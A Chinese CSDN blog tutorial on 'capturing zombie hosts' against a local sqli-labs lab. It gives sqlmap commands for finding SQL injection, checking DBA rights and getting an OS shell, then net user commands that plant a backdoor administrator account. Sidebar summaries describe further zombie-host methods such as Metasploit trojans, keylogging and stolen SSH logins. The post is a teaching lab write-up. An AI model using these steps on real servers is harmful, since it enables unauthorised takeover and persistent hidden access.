001-肉鸡抓取

最新推荐文章于 2024-03-21 11:50:22 发布
最新推荐文章于 2024-03-21 11:50:22 发布
阅读量4.4k 收藏 43
点赞数 6
文章标签: 网络安全 安全性测试 威胁分析 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43845676/article/details/119842739
版权
本文通过一个sqli-labs靶场实例,演示了如何利用SQL注入漏洞抓取肉鸡。首先,通过SQLMAP探测并确认网站存在SQL注入,接着获取服务器shell权限,然后在肉鸡上创建新用户并将其添加到管理员组,最后通过新建用户连接到肉鸡,完成抓取过程。
摘要由CSDN通过智能技术生成

001-肉鸡抓取(DOS命令:net user 用户 密码 /add)

本文以抓肉鸡为例,展示 net user 用户 密码 /addnet localgroup administrators 用户 在实战中的应用;需要在虚拟机上安装 sqli-labs 靶场,把他当作成真实的网站即可。

声明:本文所有内容仅供学习参考,请勿触犯《网络安全法》

|肉鸡的概念|DOS命令 |

用到的知识:

DOS基本命令: net user 用户 密码 /add net localgroup administrators 用户 /add
工具: SQLMAP

肉鸡抓取

要想抓取肉鸡就得先找到抓肉鸡的入口(网站漏洞),大部分被抓到的肉鸡都是因为搭建在肉鸡上的网站存在漏洞,所以其被抓。
1、虚拟机上安装好 sqli-labs 靶场后,用宿主机访问虚拟机上的靶场(下图相当于真实网站的页面)

2、用 SQLMAP 探测发现其存在SQL注入漏洞(真实网站存在SQL注入漏洞)

sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --batch

请添加图片描述
3、查看是否有权限连接网站所在服务器shell

sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --is-dba --batch

请添加图片描述
4、确定有权限后,连接服务器,获取其shell

sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --os-shell

请添加图片描述
请添加图片描述
5、拿到shell后是抓鸡成功的第一步,接下来在肉鸡上创建一个用户,并将其添加到管理员用户组。

net user www123 www123 /add

请添加图片描述

net localgroup administrators www123 /add

请添加图片描述
6、用本机连接肉鸡,连接用户和密码为上面创建的用户和密码,连接首页填服务器IP,成功抓取肉鸡

请添加图片描述
请添加图片描述

fveSeven
关注
你仿佛是一只肉鸡,67万PhpStudy开发者电脑沦为“肉鸡”!
马句
09-25 686
北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控制,并大肆盗取账号密码、聊天记录、设备码类等敏感数据多达10万多组,非法牟利600多万元。 面对如此性质恶劣的网络攻击事件,360安全大脑已国内首家完成...
003-肉鸡抓取
fiveseven的博客
08-22 435
003-肉鸡抓取
002-windowa基础(DOS命令:net user 用户 密码 /add)
fiveseven的博客
08-21 3963
002-windowa基础(DOS命令:net user 用户 密码 /add)
如何抓肉鸡
weixin_34358365的博客
02-13 2530
第一步:用scanipc扫描弱口令 不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这样的主机比较多) 第二步:连接刚扫的肉鸡 这里我用opentelnet给扫描到开了空口令的主机开个端口让我们telnet连接上去 ,开了23端口,并可以连接上的主机就不用进行次步 第一步:用scanipc扫描弱口令 不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这...
肉鸡的几种方法
m0_62207482的博客
01-09 1055
尤其是下 XXX 片 的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是 所有文件都可以这样的,我只知道 RM 和 EXE 文件可以插入),别人下载打开后同时也会带 开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马 了。(详细动画可以去黑客网站搜索 445)缺点也很明显,如果别人不是用 new 账号登入 XP 的,你再登入上去就会把他挤出 去(XP 只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开 IE 下载木马了。
肉鸡”是这样获得的
chendehui4work的备忘录专栏(邮件地址:chendehui4work@163.com)
10-25 1万+
肉鸡”是这样获得的文/图 温鹏现代计算机  总第贰贰零期  [2005-10-5] 一个月黑风高的夜晚,笔者端庄文雅地坐在电脑旁前,看着屏幕闪烁出的入侵信息,时不时地嘴角露出微笑,又成功地抓取了一只“肉鸡”。小知识:什么叫“肉鸡肉鸡是指在网络上,已经被你成功入侵的主机,并且这台机器完全受控于入侵者的任意操作,如同本机操控一样的直观顺手。但是对于网络“肉鸡”的抓取,大家可以利用IPC$特殊共享的
管中窥豹---分析一个只抓中国肉鸡的DDOS团伙
weixin_33725722的博客
03-08 608
virustracker · 2015/06/17 10:19source:https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-chinese-users-part-2/最近,我们的研究人员发现了一个非常奇怪的exploit kit正在攻击中国的域名。在上一篇文章中,我们详细地讨论了这个exp...
肉鸡屠宰、包装、存储发货作业指导书.doc
01-12
- 关键步骤:熟练操作挂鸡,避免野蛮抓取,确保鸡只背部朝向操作者。 - 品质要求:挂鸡准确,避免挂单腿、双腿合挂的现象。 - 安全规定:处理死鸡需隔离,确保笼盖关严,避免意外。 整个流程强调了严格的品质...
kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1512
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马,msfvenommsfve...
146-从Java RMI反序列化到内网沦陷.pdf
09-20
内网渗透是指攻击者在已经控制了一台机器(肉鸡)之后,利用该机器进一步渗透到内网中的其他机器。文档中提到了使用lcx代理、mimikatz等工具进行内网流量监控、弱口令爆破和横向移动。 5. 密码抓取与利用: 文中...
NetUserAdd新建用户并使用NetLocalGroupAddMembers添加到组
08-23 1870
USER_INFO_1 ui; DWORD dwError=0; ui.usri1_name=L"wwy"; ui.usri1_password=L"12345"; ui.usri1_priv=USER_PRIV_USER; ui.usri
Windows系统命令 net user用法
最新发布
veryhappy1979的专栏
03-21 3648
在Windows过程中,最常用的要数net user 命令了,但是非常多的时候我们都是对Linux命令非常熟悉,对Windows命令非常熟悉或者了解用法的少只有少,为了以后工作方便,这里记录一下Windows系统中的 net user 命令的用法。一、有问题找Help:12345678此命令的语法是 :NET USER二、详细解释:参数:username: 指定用户名password: 使用密码命令:/add 添加用户。
net user 用户名 密码 /add 建立用户
热门推荐
杨航的专栏
07-11 3万+
net user 用户名 密码 /add 建立用户 other: net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密
kali linux捉肉鸡教程,简单扫4899端口捉肉鸡菜鸟教程详细版
weixin_29513805的博客
05-02 3231
简单扫4899端口捉肉鸡 (菜鸟教程详细版)大家好。我是☆黑色毛衣☆。今天做的是简单扫4899端口捉肉鸡,只要把工具用好。找端口肉鸡不难可能有些扫135端口的扫描不了。这样就试试4899吧。因为扫135端口有些地方限制了。所以扫描不了。好了,话不多打。我们今次用到的工具有:1.S扫描器 (端口扫描器)2.4899过滤器 (过滤4899端口空密码主机专用)3.radmin (一个远程控制软件)4.免...
linux抓肉鸡入侵详细教程,一台linux肉鸡的简单手工入侵检测过程
weixin_39727336的博客
05-02 877
今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。[root@mail ~]# cat /tmp/sshpswdldc:sle823jfsGs@222.222.66.11直接ssh上去。[root@mail ~]# ssh ldc@222.222.66.11ldc@222.222.66.11's password:Last login: Fri Jul 17 13:11:38 20...
kali 肉鸡的操作
qq_33391644的博客
02-08 6308
1.屏幕截图命令:screenshot 2.键盘记录命令:keyscan_start   //开启 keyscan_dump //显示键盘记录keyscan_stop //关闭键盘记录3.结束进程命令:Kill 进程4.查看进程命令:ps5.重启电脑命令:Reboot6.关闭电脑命令:Shutdown7.获取电脑信息命令:sysinfo8.音频录音命令:record_mic -d 秒数9.打开窗体...
windows net user 添加用户
AntHub的博客
12-19 2612
文章目录问题net user 解决 问题 使用控制面板/设置 添加用户时: 显示成这样;可能是因为 win10 家庭版的原因; net user 解决 以管理员身份运行 cmd; 执行 net user user_name password_str /add;
入门者如何获得肉鸡
JavaFans && Boy With The Wind
08-17 5410
入门者如何获取肉鸡(跳板)今天我们来讲一讲一些简单的入侵,这篇文章是送给新手的,难的文章我也写不出来~~ 这里讲的方法都是针对winnt和2000的,平台是2000。我只是想送给新手点肉鸡罢了。 罗嗦了这么多,现在我们开始吧~。首先我们来对几个扫描器评点一下什么?你不知道扫描器是什么?我晕~~~扫描器就是扫描的嘛,它可以检测出主机的漏洞! 常见的有端口扫描器,和cgi漏洞扫描器,还有就是象流光那样
肉鸡命令行可以用那些指令
07-04
肉鸡(指受控制的被黑客入侵的计算机)的命令行中,黑客通常使用各种指令来执行各种操作。这些指令可能会有所变化,具体取决于黑客使用的攻击工具和操作系统。以下是一些常见的肉鸡命令行指令示例: 1. 文件操作: - ls:列出目录中的文件和文件夹。 - cd:更改当前目录。 - rm:删除文件或文件夹。 - mv:移动或重命名文件。 - cp:复制文件或文件夹。 2. 网络操作: - ifconfig:显示网络接口配置信息。 - netstat:显示网络连接和统计信息。 - ping:向目标主机发送 ICMP 回显请求。 - wget/curl:下载文件或网页内容。 3. 系统操作: - ps:显示当前运行的进程。 - kill:终止指定的进程。 - reboot/shutdown:重启或关闭系统。 - sysctl:查看和修改内核参数。 4. 后门操作: - backdoor:开启或关闭后门访问。 - shell:获取对目标系统的远程 shell 访问权限。 - keylogger:记录键盘输入。 请注意,这些指令仅供了解,不鼓励或支持非法活动。保护计算机安全网络安全非常重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值